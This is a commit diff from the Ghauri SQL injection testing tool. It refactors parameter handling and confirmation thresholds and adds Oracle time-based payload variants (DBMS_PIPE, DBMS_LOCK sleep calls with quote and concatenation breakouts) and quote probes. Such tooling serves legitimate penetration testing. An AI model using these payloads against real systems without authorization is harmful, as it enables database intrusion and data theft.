STRLCPY/ghauri

updated code quality..
r0oth3x49 committed 1 year ago

1b21ad5b

1 parent 5186632e

■ ■ ■ ■ ■ ■

ghauri/common/payloads.py

		skipped 1678 lines
1679	1679		"payload": "DBMS_PIPE.RECEIVE_MESSAGE('IsjT',[SLEEPTIME])",
1680	1680		"comments": [
1681	1681		{"pref": "", "suf": ""},
1682		-	{"pref": "AND 8675=", "suf": "--"},
1683		-	{"pref": "OR 8675=", "suf": "--"},
1684		-	# {"pref": "' ", "suf": ""},
	1682	+	{"pref": " AND 8675=", "suf": ""},
	1683	+	{"pref": " OR 8675=", "suf": ""},
	1684	+	{"pref": "' ", "suf": ""},
	1685	+	{"pref": "'\|\|", "suf": "\|\|'"},
1685	1686		{"pref": "' AND 8675=", "suf": "--"},
1686	1687		{"pref": "' OR 8675=", "suf": "--"},
1687	1688		# {"pref": '" ', "suf": ""},
	1689	+	{"pref": '"\|\|', "suf": '\|\|"'},
1688	1690		{"pref": '" AND 8675=', "suf": "--"},
1689	1691		{"pref": '" OR 8675=', "suf": "--"},
1690	1692		# {"pref": ") ", "suf": ""},
		skipped 14 lines
1705	1707		"payload": "DBMS_LOCK.SLEEP([SLEEPTIME])",
1706	1708		"comments": [
1707	1709		{"pref": "", "suf": ""},
1708		-	{"pref": "AND 8675=", "suf": "--"},
1709		-	{"pref": "OR 8675=", "suf": "--"},
1710		-	# {"pref": "' ", "suf": ""},
	1710	+	{"pref": " AND 8675=", "suf": ""},
	1711	+	{"pref": " OR 8675=", "suf": ""},
	1712	+	{"pref": "' ", "suf": ""},
	1713	+	{"pref": "'\|\|", "suf": "\|\|'"},
1711	1714		{"pref": "' AND 8675=", "suf": "--"},
1712	1715		{"pref": "' OR 8675=", "suf": "--"},
1713	1716		# {"pref": '" ', "suf": ""},
	1717	+	{"pref": '"\|\|', "suf": '\|\|"'},
1714	1718		{"pref": '" AND 8675=', "suf": "--"},
1715	1719		{"pref": '" OR 8675=', "suf": "--"},
1716	1720		# {"pref": ") ", "suf": ""},
		skipped 14 lines
1731	1735		"payload": "USER_LOCK.SLEEP([SLEEPTIME])",
1732	1736		"comments": [
1733	1737		{"pref": "", "suf": ""},
1734		-	{"pref": "AND 8675=", "suf": "--"},
1735		-	{"pref": "OR 8675=", "suf": "--"},
1736		-	# {"pref": "' ", "suf": ""},
	1738	+	{"pref": " AND 8675=", "suf": ""},
	1739	+	{"pref": " OR 8675=", "suf": ""},
	1740	+	{"pref": "' ", "suf": ""},
	1741	+	{"pref": "'\|\|", "suf": "\|\|'"},
1737	1742		{"pref": "' AND 8675=", "suf": "--"},
1738	1743		{"pref": "' OR 8675=", "suf": "--"},
1739	1744		# {"pref": '" ', "suf": ""},
	1745	+	{"pref": '"\|\|', "suf": '\|\|"'},
1740	1746		{"pref": '" AND 8675=', "suf": "--"},
1741	1747		{"pref": '" OR 8675=', "suf": "--"},
1742	1748		# {"pref": ") ", "suf": ""},
		skipped 315 lines

■ ■ ■ ■ ■ ■

ghauri/common/utils.py

		skipped 697 lines
698	698		if (
699	699		not difference
700	700		and conf.match_ratio
701		-	and conf.match_ratio != ratio_true
	701	+	and conf.match_ratio in [ratio_true, ratio_false]
	702	+	# and conf.match_ratio != ratio_true
702	703		):
703	704		is_vulner = True
704	705		case = "Match Ratio"
		skipped 388 lines
1093	1094		is_multipart=False,
1094	1095		):
1095	1096		prepared_payload = ""
1096		-	key = param.get("key")
1097		-	value = param.get("value")
	1097	+	key = param.key
	1098	+	value = param.value
1098	1099		is_json = conf.is_json
1099	1100		is_multipart = conf.is_multipart
1100	1101		safe = (
		skipped 30 lines
1131	1132		injection_type=injection_type,
1132	1133		is_multipart=is_multipart,
1133	1134		)
1134		-	if injection_type == "GET" and is_json and encode:
	1135	+	if encode and param.type == "" and is_json:
1135	1136		payload = urlencode(
1136	1137		value=payload,
1137	1138		decode_first=True,
		skipped 178 lines
1316	1317		value = ""
1317	1318		_out.update({"value": value})
1318	1319		if _out:
1319		-	_out.update({"parameter_type": "MULTIPART "})
	1320	+	_out.update({"type": "MULTIPART "})
1320	1321		_temp.append(_out)
1321	1322		return _temp
1322	1323
		skipped 78 lines
1401	1402		extract_json_data(i)
1402	1403		if isinstance(i, str):
1403	1404		conf._json_post_data.append(
1404		-	{"key": key, "value": i, "parameter_type": "JSON "}
	1405	+	{"key": key, "value": i, "type": "JSON "}
1405	1406		)
1406	1407		elif isinstance(value, str):
1407	1408		conf._json_post_data.append(
1408		-	{"key": key, "value": value, "parameter_type": "JSON "}
	1409	+	{"key": key, "value": value, "type": "JSON "}
1409	1410		)
1410	1411		# logger.debug(conf._json_post_data)
1411	1412		return conf._json_post_data
		skipped 26 lines
1438	1439		"InjectionPoints",
1439	1440		[
1440	1441		"custom_injection_in",
1441		-	"injection_points",
	1442	+	# "injection_points",
1442	1443		"is_multipart",
1443	1444		"is_json",
1444	1445		"injection_point",
		skipped 6 lines
1451	1452		{
1452	1453		"key": i.split(":")[0].strip(),
1453	1454		"value": i.split(":")[-1].strip(),
1454		-	"parameter_type": "",
	1455	+	"type": "",
1455	1456		}
1456	1457		for i in out
1457	1458		if i
		skipped 21 lines
1479	1480		{
1480	1481		"key": i.split("=")[0].strip(),
1481	1482		"value": i.split("=")[-1].strip(),
1482		-	"parameter_type": "",
	1483	+	"type": "",
1483	1484		}
1484	1485		for i in out
1485	1486		if i
		skipped 26 lines
1512	1513		{
1513	1514		"key": k.strip(),
1514	1515		"value": "".join(v).replace("+", "%2b"),
1515		-	"parameter_type": "",
	1516	+	"type": "",
1516	1517		}
1517	1518		for k, v in params.items()
1518	1519		]
		skipped 7 lines
1526	1527		{
1527	1528		"key": k.strip(),
1528	1529		"value": "".join(v),
1529		-	"parameter_type": "",
	1530	+	"type": "",
1530	1531		}
1531	1532		for k, v in params.items()
1532	1533		]
		skipped 2 lines
1535	1536		{
1536	1537		"key": "#1*",
1537	1538		"value": "*",
1538		-	"parameter_type": "",
	1539	+	"type": "",
1539	1540		}
1540	1541		]
1541	1542		_injection_points.update({"GET": params})
		skipped 15 lines
1557	1558		injection_point.update({_type: _})
1558	1559		_temp = InjectionPoints(
1559	1560		custom_injection_in=list(set(custom_injection_in)),
1560		-	injection_points=_injection_points,
	1561	+	# injection_points=_injection_points,
1561	1562		is_multipart=is_multipart,
1562	1563		is_json=is_json,
1563	1564		injection_point=injection_point,
		skipped 462 lines

■ ■ ■ ■ ■ ■

ghauri/core/tests.py

		skipped 62 lines
63	63		payloads_to_objects,
64	64		merge_time_based_attack_payloads,
65	65		encode_object,
	66	+	Struct,
66	67		)
67	68
68	69
		skipped 13 lines
82	83		):
83	84		is_dynamic = False
84	85		is_resumed = False
85		-	param_name = ""
86	86		is_parameter_tested = False
87		-	if is_multipart:
88		-	param_name += "MULTIPART "
89		-	if is_json:
90		-	param_name += "JSON "
91		-	param_name += parameter.get("key")
92		-	param_key = parameter.get("key")
	87	+	param_name = f"{parameter.type}{parameter.key}"
	88	+	param_key = parameter.key
93	89		Response = collections.namedtuple(
94	90		"BasicCheckResponse",
95	91		[
		skipped 24 lines
120	116		to_object=True,
121	117		)
122	118		if retval:
123		-	json_data_parameters = [json.loads(i.parameter) for i in retval]
	119	+	json_data_parameters = [Struct(**json.loads(i.parameter)) for i in retval]
124	120		params_tested_already = list(
125		-	set(
126		-	[
127		-	i
128		-	for i in [
129		-	i.get("key", "").lower() for i in json_data_parameters
130		-	]
131		-	if i
132		-	]
133		-	)
	121	+	set([i for i in [i.key.lower() for i in json_data_parameters] if i])
134	122		)
135		-	param_tobe_tested = parameter.get("key").lower()
	123	+	param_tobe_tested = parameter.key.lower()
136	124		if param_tobe_tested in params_tested_already:
137	125		logger.debug(f"parameter '{param_tobe_tested}' is already tested..")
138	126		is_parameter_tested = True
		skipped 37 lines
176	164		exit(0)
177	165		if not is_resumed:
178	166		param_name = f"{mc}{param_name}{nc}"
179		-	expressions = ["'\",..))", "',..))", '",..))']
	167	+	expressions = ["'\",..))", "',..))", '",..))', "'\"", "%27%22"]
180	168		for expression in expressions:
181	169		attack = inject_expression(
182	170		url=url,
		skipped 143 lines
326	314		):
327	315		_temp = []
328	316		Response = collections.namedtuple("Response", ["vulnerable", "tests_performed"])
329		-	param_key = parameter.get("key")
330		-	param_value = parameter.get("value")
	317	+	param_key = parameter.key
	318	+	param_value = parameter.value
331	319		test_payloads = [
332	320		{
333	321		"true": {"payload": "238=6*8", "response": True},
		skipped 16 lines
350	338		"false": {"payload": "320=6", "response": False},
351	339		},
352	340		]
353		-	if response_time > 8 or confirmation:
	341	+	if response_time > 8:
354	342		test_payloads = test_payloads[0:3]
355	343		for entry in test_payloads:
356	344		if delay > 0:
		skipped 79 lines
436	424		logger.critical(f"error {error}, during time-based confirmation phase.")
437	425		break
438	426		attempts_count = len(_temp)
439		-	total_attempts_to_vulnerable = len(test_payloads) - 2
440		-	if attempts_count >= total_attempts_to_vulnerable:
	427	+	total_attempts_to_vulnerable = len(test_payloads)
	428	+	perc = attempts_count // total_attempts_to_vulnerable * 100
	429	+	logger.debug(
	430	+	f"further tests shows that the chances are {perc}% for the target to be injected.."
	431	+	)
	432	+	if perc >= 80:
441	433		vulnerable = check_booleanbased_tests(_temp)
442	434		else:
443	435		if response_time > 8:
444		-	if attempts_count >= total_attempts_to_vulnerable:
	436	+	if perc >= 70:
445	437		vulnerable = check_booleanbased_tests(_temp)
446	438		else:
447	439		vulnerable = False
		skipped 61 lines
509	501		booleanbased_only=True, dbms=dbms or possible_dbms
510	502		)
511	503		blind_payloads.extend(dbms_specific_boolean_payloads)
512		-	param_key = parameter.get("key")
513		-	param_value = parameter.get("value")
	504	+	param_key = parameter.key
	505	+	param_value = parameter.value
514	506		is_injected = False
515	507		injection_type = injection_type.upper()
516	508		end_detection_phase = False
		skipped 208 lines
725	717		if param_key == "#1*":
726	718		_it = "URI"
727	719		if is_multipart:
728		-	message = f"(custom) {injection_type} parameter '{mc}MULTIPART {param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
	720	+	message = f"(custom) {injection_type} parameter '{mc}{parameter.type}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
729	721		elif is_json:
730		-	message = f"(custom) {injection_type} parameter '{mc}JSON {param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
	722	+	message = f"(custom) {injection_type} parameter '{mc}{parameter.type}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
731	723		else:
732		-	message = f"{_it} parameter '{mc}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
	724	+	message = f"{_it} parameter '{mc}{parameter.type}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
733	725		logger.notice(message)
734	726		if not possible_dbms and not dbms:
735	727		inj = FingerPrintDBMS(
		skipped 32 lines
768	760		"Ghauri could not determine the backend DBMS, detected payload is false positive, performing further tests.."
769	761		)
770	762		logger.warning(
771		-	"false positive payload detected, continue testing remaining payloads.."
	763	+	"false positive payload detected, Ghauri will perform further test(s) if any to ensure if target is injectable.."
772	764		)
773	765		continue
774	766		if backend:
		skipped 69 lines
844	836		if is_read_timedout:
845	837		TEST_CASES_COUNT = 3
846	838		inferences = [
847		-	{"inference": "05689=5689", "response": True},
848	839		{"inference": "09637=5556", "response": False},
849		-	{"inference": "02687=26877", "response": False},
850	840		{"inference": "8965=8956", "response": False},
851	841		{"inference": "9686=9686", "response": True},
	842	+	{"inference": "01648=2567", "response": False},
	843	+	{"inference": "05689=5689", "response": True},
852	844		]
853	845		Response = collections.namedtuple("Response", ["vulnerable", "tests_performed"])
854		-	param_key = parameter.get("key")
855		-	param_value = parameter.get("value")
	846	+	param_key = parameter.key
	847	+	param_value = parameter.value
856	848		sleep_times = [i for i in range(0, 10) if i != injected_sleep_time]
857	849		for _ in range(10):
858	850		random.shuffle(sleep_times)
		skipped 29 lines
888	880		decoded_expression, str(response_time), str(is_ok)
889	881		)
890	882		)
891		-	if response_inference:
	883	+	if response_inference and is_ok:
892	884		_temp.append(
893	885		{
894	886		"payload": decoded_expression,
895	887		"response_time": response_time,
896	888		}
897	889		)
	890	+	if response_inference and not is_ok:
	891	+	# in case of read timeout we GET a false postive type we don't test it further..
	892	+	break
898	893		except KeyboardInterrupt as error:
899	894		logger.warning("user aborted during time-based confirmation phase.")
900	895		break
		skipped 126 lines
1027	1022		payloads_list = merge_time_based_attack_payloads(
1028	1023		time_based_payloads, stack_queries_payloads
1029	1024		)
1030		-	param_key = parameter.get("key")
1031		-	param_value = parameter.get("value")
	1025	+	param_key = parameter.key
	1026	+	param_value = parameter.value
1032	1027		# in case of very slow internet users we will consider timesec value for testing and it should be >= 10 otherwise with good internet we are good to consider random sleep value
1033	1028		sleep_time = timesec if timesec >= 10 else random.randint(5, 9)
1034	1029		injection_type = injection_type.upper()
		skipped 140 lines
1175	1170		if param_key == "#1*":
1176	1171		_it = "URI"
1177	1172		if is_multipart:
1178		-	message = f"(custom) {injection_type} parameter '{mc}MULTIPART {param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
	1173	+	message = f"(custom) {injection_type} parameter '{mc}{parameter.type}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
1179	1174		elif is_json:
1180		-	message = f"(custom) {injection_type} parameter '{mc}JSON {param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
	1175	+	message = f"(custom) {injection_type} parameter '{mc}{parameter.type}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
1181	1176		else:
1182		-	message = f"{_it} parameter '{mc}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
	1177	+	message = f"{_it} parameter '{mc}{parameter.type}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
1183	1178		if with_status_code_msg and "ReadTimeout" in with_status_code_msg:
1184	1179		logger.warning(
1185	1180		"in case of read timeout performing further tests to confirm if the detected payload is working.."
		skipped 103 lines
1289	1284		],
1290	1285		)
1291	1286		error_based_payloads = fetch_db_specific_payload(dbms=dbms, error_based_only=True)
1292		-	param_key = parameter.get("key")
1293		-	param_value = parameter.get("value")
	1287	+	param_key = parameter.key
	1288	+	param_value = parameter.value
1294	1289		sleep_time = random.randint(5, 9)
1295	1290		injection_type = injection_type.upper()
1296	1291		is_injected = False
		skipped 196 lines
1493	1488		if param_key == "#1*":
1494	1489		_it = "URI"
1495	1490		if is_multipart:
1496		-	message = f"(custom) {injection_type} parameter '{mc}MULTIPART {param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
	1491	+	message = f"(custom) {injection_type} parameter '{mc}{parameter.type}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
1497	1492		elif is_json:
1498		-	message = f"(custom) {injection_type} parameter '{mc}JSON {param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
	1493	+	message = f"(custom) {injection_type} parameter '{mc}{parameter.type}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
1499	1494		else:
1500		-	message = f"{_it} parameter '{mc}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
	1495	+	message = f"{_it} parameter '{mc}{parameter.type}{param_key}{nc}' appears to be '{mc}{entry.title}{nc}' injectable{with_status_code_msg}"
1501	1496		logger.notice(message)
1502	1497		_url = attack.request_url if injection_type == "GET" else attack.url
1503	1498		if conf.req_counter_injected < 1:
		skipped 62 lines
1566	1561		message_list = []
1567	1562		for entry in retval:
1568	1563		param_name = entry.parameter.key
1569		-	param_value = entry.parameter.value
	1564	+	param_value = entry.parameter.value.replace("*", "")
1570	1565		results = entry.result
1571	1566		if param_name not in param_set:
1572	1567		_p = f"{param_name}"
1573	1568		_it = injection_type if param_name != "#1*" else "URI"
1574	1569		if is_json:
1575		-	_p = f"JSON {param_name}"
	1570	+	_p = f"{entry.parameter.parameter_type}{param_name}"
1576	1571		_it = f"(custom) {injection_type}"
1577	1572		if is_multipart:
1578		-	_p = f"MULTIPART {param_name}"
	1573	+	_p = f"{entry.parameter.parameter_type}{param_name}"
1579	1574		_it = f"(custom) {injection_type}"
1580	1575		message_ok = "Parameter: {} ({})".format(_p, _it)
1581	1576		param_set.add(param_name)
		skipped 12 lines
1594	1589		_data = prepare_attack_request(
1595	1590		text=data,
1596	1591		payload=payload,
1597		-	param=vars(res.parameter),
	1592	+	param=res.parameter,
1598	1593		is_multipart=is_multipart,
1599	1594		injection_type=injection_type,
1600	1595		encode=False,
		skipped 2 lines
1603	1598		_url = prepare_attack_request(
1604	1599		text=url,
1605	1600		payload=payload,
1606		-	param=vars(res.parameter),
	1601	+	param=res.parameter,
1607	1602		injection_type=injection_type,
1608	1603		encode=False,
1609	1604		)
		skipped 69 lines
1679	1674		)
1680	1675		retval = ok.retval
1681	1676		if retval:
1682		-	if parameter.get("key") not in ok.tested_parameters:
1683		-	logger.debug(f"parameter '{parameter.get('key')}' is not tested..")
	1677	+	if parameter.key not in ok.tested_parameters:
	1678	+	logger.debug(f"parameter '{parameter.key}' is not tested..")
1684	1679		return None
1685	1680		Response = collections.namedtuple(
1686	1681		"Session",
		skipped 328 lines
2015	2010		not_match_string=not_match_string,
2016	2011		vectors=vectors,
2017	2012		injection_type=entry.injection_type,
2018		-	param=vars(param_info),
	2013	+	param=param_info,
2019	2014		backend=entry.backend,
2020	2015		is_string=is_string,
2021	2016		)
		skipped 5 lines
2027	2022		msg += "(custom) "
2028	2023		msg += f"{entry.injection_type} parameter "
2029	2024		if is_multipart:
2030		-	name = f"MULTIPART {param_info.key}"
	2025	+	name = f"{param_info.type}{param_info.key}"
2031	2026		if is_json:
2032		-	name = f"JSON {param_info.key}"
	2027	+	name = f"{param_info.type}{param_info.key}"
2033	2028		msg += f"'{name}' does not seem to be injectable"
2034	2029		logger.debug(msg)
2035	2030		if not bool(_temp):
		skipped 167 lines
2203	2198		match_string=retval_session.match_string,
2204	2199		is_string=retval_session.is_string,
2205	2200		)
2206		-	param_name += parameter.get("key")
2207		-	param_value = parameter.get("value")
	2201	+	param_name += parameter.key
	2202	+	param_value = parameter.value
2208	2203		if "E" in techniques and possible_dbms:
2209	2204		esqli = check_errorbased_sqli(
2210	2205		base,
		skipped 141 lines
2352	2347		if param_name == "#1*":
2353	2348		_it = "URI"
2354	2349		if is_multipart:
2355		-	message = f"checking if the injection point on (custom) {injection_type} parameter 'MULTIPART {param_name}' is a false positive"
	2350	+	message = f"checking if the injection point on (custom) {injection_type} parameter '{parameter.type}{param_name}' is a false positive"
2356	2351		elif is_json:
2357		-	message = f"checking if the injection point on (custom) {injection_type} parameter 'JSON {param_name}' is a false positive"
	2352	+	message = f"checking if the injection point on (custom) {injection_type} parameter '{parameter.type}{param_name}' is a false positive"
2358	2353		else:
2359		-	message = f"checking if the injection point on {_it} parameter '{param_name}' is a false positive"
	2354	+	message = f"checking if the injection point on {_it} parameter '{parameter.type}{param_name}' is a false positive"
2360	2355		logger.info(message)
2361	2356		if "boolean-based" in priority_keys and not error_based_in_priority:
2362	2357		retval = priorities.get("boolean-based")
		skipped 59 lines
2422	2417		if param_name == "#1*":
2423	2418		_it = "URI"
2424	2419		if is_multipart:
2425		-	message = f"\n(custom) {injection_type} parameter 'MULTIPART {param_name}' is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
	2420	+	message = f"\n(custom) {injection_type} parameter '{parameter.type}{param_name}' is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
2426	2421		elif is_json:
2427		-	message = f"\n(custom) {injection_type} parameter 'JSON {param_name}' is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
	2422	+	message = f"\n(custom) {injection_type} parameter '{parameter.type}{param_name}' is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
2428	2423		else:
2429		-	message = f"\n{_it} parameter '{param_name}' is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
	2424	+	message = f"\n{_it} parameter '{parameter.type}{param_name}' is vulnerable. Do you want to keep testing the others (if any)? [y/N] "
2430	2425		question = logger.read_input(message, batch=batch, user_input="N")
2431	2426		if sqlis:
2432	2427		boolean = priorities.get("boolean-based")
		skipped 18 lines
2451	2446		entry.payload,
2452	2447		entry.prepared_vector,
2453	2448		entry.backend,
2454		-	json.dumps(entry.param),
	2449	+	json.dumps(vars(entry.param)),
2455	2450		entry.injection_type,
2456	2451		entry.payload_type,
2457	2452		base.path,
2458		-	parameter.get("parameter_type"),
	2453	+	parameter.type,
2459	2454		_string,
2460	2455		_not_string,
2461	2456		_attack01,
		skipped 47 lines
2509	2504		if param_name == "#1*":
2510	2505		_it = "URI"
2511	2506		if is_multipart:
2512		-	msg = f"(custom) {injection_type} parameter '{mc}MULTIPART {param_name}{nc}' does not seem to be injectable"
	2507	+	msg = f"(custom) {injection_type} parameter '{mc}{parameter.type}{param_name}{nc}' does not seem to be injectable"
2513	2508		if is_json:
2514		-	msg = f"(custom) {injection_type} parameter '{mc}JSON {param_name}{nc}' does not seem to be injectable"
	2509	+	msg = f"(custom) {injection_type} parameter '{mc}{parameter.type}{param_name}{nc}' does not seem to be injectable"
2515	2510		else:
2516		-	msg = f"{_it} parameter '{mc}{param_name}{nc}' does not seem to be injectable"
	2511	+	msg = f"{_it} parameter '{mc}{parameter.type}{param_name}{nc}' does not seem to be injectable"
2517	2512		logger.notice(msg)
2518	2513		else:
2519	2514		_it = injection_type
2520	2515		if param_name == "#1*":
2521	2516		_it = "URI"
2522	2517		if is_multipart:
2523		-	msg = f"(custom) {injection_type} parameter '{mc}MULTIPART {param_name}{nc}' does not seem to be injectable"
	2518	+	msg = f"(custom) {injection_type} parameter '{mc}{parameter.type}{param_name}{nc}' does not seem to be injectable"
2524	2519		if is_json:
2525		-	msg = f"(custom) {injection_type} parameter '{mc}JSON {param_name}{nc}' does not seem to be injectable"
	2520	+	msg = f"(custom) {injection_type} parameter '{mc}{parameter.type}{param_name}{nc}' does not seem to be injectable"
2526	2521		else:
2527		-	msg = (
2528		-	f"{_it} parameter '{mc}{param_name}{nc}' does not seem to be injectable"
2529		-	)
	2522	+	msg = f"{_it} parameter '{mc}{parameter.type}{param_name}{nc}' does not seem to be injectable"
2530	2523		logger.notice(msg)
2531	2524		return None
2532	2525

■ ■ ■ ■ ■ ■

ghauri/ghauri.py

		skipped 131 lines
132	132		levels = {2: "COOKIE", 3: "HEADER"}
133	133		raw = ""
134	134		if requestfile:
	135	+	if not os.path.isfile(requestfile):
	136	+	logger.error(
	137	+	"invalid filename of file location, please provide correct filepath e.g:- '-r /path/to/requestfile.txt'"
	138	+	)
	139	+	logger.end("ending")
	140	+	exit(0)
135	141		logger.info(f"parsing HTTP request from '{requestfile}'")
136	142		raw = "\n".join([i.strip() for i in open(requestfile) if i])
137	143		if raw:
		skipped 31 lines
169	175		level = 2
170	176		if "HEADER" in custom_injection_in:
171	177		level = 3
172		-	injection_points = obj.injection_points
	178	+	injection_points = obj.injection_point
173	179		conf.is_multipart = is_multipart = obj.is_multipart
174	180		conf.is_json = is_json = obj.is_json
175	181		conf.text_only = text_only
		skipped 76 lines
252	258		is_json_asked = True
253	259		parameters = injection_points.get(injection_type)
254	260		if testparameter:
255		-	parameters = [i for i in parameters if i.get("key") in testparameter]
	261	+	parameters = [i for i in parameters if i.key in testparameter]
256	262		conf.params_count = len(parameters)
257	263		for parameter in parameters:
258		-	param_name = parameter.get("key")
259		-	param_value = parameter.get("value")
	264	+	param_name = parameter.key
	265	+	param_value = parameter.value
260	266		is_parameter_tested = False
261	267		is_custom_injection_marker_found = bool(
262	268		"" in param_name or "" in param_value
		skipped 47 lines
310	316		msg = f"testing for SQL injection on (custom) {injection_type} parameter '{param_name}'"
311	317		elif "POST" in custom_point:
312	318		if is_multipart:
313		-	msg = f"testing for SQL injection on (custom) {injection_type} parameter 'MULTIPART {param_name}'"
	319	+	msg = f"testing for SQL injection on (custom) {injection_type} parameter '{parameter.type}{param_name}'"
314	320		elif is_json:
315		-	msg = f"testing for SQL injection on (custom) {injection_type} parameter 'JSON {param_name}'"
	321	+	msg = f"testing for SQL injection on (custom) {injection_type} parameter '{parameter.type}{param_name}'"
316	322		else:
317	323		msg = f"testing for SQL injection on (custom) {injection_type} parameter '{param_name}'"
318	324		else:
319	325		if is_multipart:
320		-	msg = f"testing for SQL injection on (custom) {injection_type} parameter 'MULTIPART {param_name}'"
	326	+	msg = f"testing for SQL injection on (custom) {injection_type} parameter '{parameter.type}{param_name}'"
321	327		elif is_json:
322		-	msg = f"testing for SQL injection on (custom) {injection_type} parameter 'JSON {param_name}'"
	328	+	msg = f"testing for SQL injection on (custom) {injection_type} parameter '{parameter.type}{param_name}'"
323	329		else:
324	330		msg = f"testing for SQL injection on {injection_type} parameter '{param_name}'"
325	331		logger.info(msg)
		skipped 481 lines

updated code quality..